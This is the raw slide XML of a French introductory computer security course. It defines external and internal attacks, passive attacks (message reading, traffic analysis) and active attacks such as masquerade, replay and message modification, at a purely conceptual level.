            </a:fld>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459" y="3393101"/>
            <a:ext cx="6251000" cy="3312496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221402" y="1228040"/>
            <a:ext cx="5259978" cy="195058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Une attaque externe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: est initiée depuis l'extérieur du périmètre, par un utilisateur non autorisé ou illégitime du système</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Plus difficiles à réaliser (plusieurs mécanismes de sécurité à contourner d’abord) MAIS plus faciles à détecter</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5876987" y="1228040"/>
            <a:ext cx="6375342" cy="212991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Une attaque interne: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>est initiée par une entité dans le périmètre de sécurité, c'est‐à‐dire une entité autorisée à accéder aux ressources du système mais qui les utilise d'une manière non approuvée par ceux qui ont accordé l'autorisation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Plus faciles à réaliser (on est déjà dans le système) MAIS plus difficiles à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>détecter)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35679538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97175"/>
            <a:ext cx="10515600" cy="773210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Plan du cours</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1378973"/>
            <a:ext cx="10515600" cy="5131836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Introduction à la sécurité informatique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Initiation à la cryptographie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Les menaces informatiques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques applicatives et systèmes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les attaques Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>réseaux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Mécanismes de défenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24405139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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="11684728" cy="5915723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Attaques passives :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Tentent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d'apprendre ou d'utiliser des informations du système mais n'affecte pas les ressources du système. (P. Ex., Écoutes téléphoniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les attaques passive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>consistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>à écouter et à surveiller les transmissions sur un canal. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>but de l'attaquant et d'intercepter les informations transmises. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>y a 2 types d'attaque passive : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>la lecture des messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>l'analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>trafic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Relativement difficile à détecter, mais plus facile à prévenir </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Attaques actives :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>tentent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de modifier les ressources du système ou d'affecter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>leur fonctionnement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>la détection est facilitée, mais il peut être déjà trop tard lorsque celle-ci a lieu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Action de modification, suppression ou création non autorisées et délibérées de l’état du système. Elle provoque le dommage ou altération du système </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" b="1"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20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1548341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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805753"/>
            <a:ext cx="11684728" cy="3858036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaques passives : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>il y a deux types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Lecture des messages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>données sont envoyées en clair( conversation téléphonique, email, fichier, …). </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>données peuvent contenir des informations sensibles ou confidentiel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>empêcher la lecture des messages, on peut utiliser le chiffrement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Analyse du trafic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les messages sont illisibles (en utilisant le chiffrement), l'adversaire ne peux pas les lire mais peux analyser le trafic. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'adversaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>peut déterminer l'emplacement et l'identité des hôtes de la communication il peut observer la fréquence et la longueur des messages échangés. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>informations peuvent être utile à deviner la nature de la communication qui se déroule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" b="1"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21</a:t>
            </a:fld>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33" y="4800313"/>
            <a:ext cx="7697274" cy="2057687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19033804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attaques actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11500822" cy="3675473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Masquerade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> (Usurpation d’identité)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette attaque a lieu lorsqu'une entité prétend être une entité différente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>C'est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l'origine des attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>actives : les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>autres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>formes d'attaques actives (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>rejeu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, modification et déni de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1"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22</a:t>
            </a:fld>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6755" y="4356915"/>
            <a:ext cx="6306430" cy="2353003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1360819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attaques actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11500822" cy="3675473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Rejeu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Cette attaque est réalisée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>en deux phases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>capture passive d'un message </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>retransmission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ultérieure de ce message pour produire un effet non autorisé </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Rejeu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> d'une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>transaction bancaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>dont </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le pirate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>bénéficiaire</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1"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23</a:t>
            </a:fld>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679" y="4156549"/>
            <a:ext cx="6382641" cy="2524477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1242928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attaques actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11500822" cy="3973512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Modification des messages</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ignifie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>que certaines portions d’un message légitime sont altérées ou que</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les messages sont retardés ou réorganisés. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
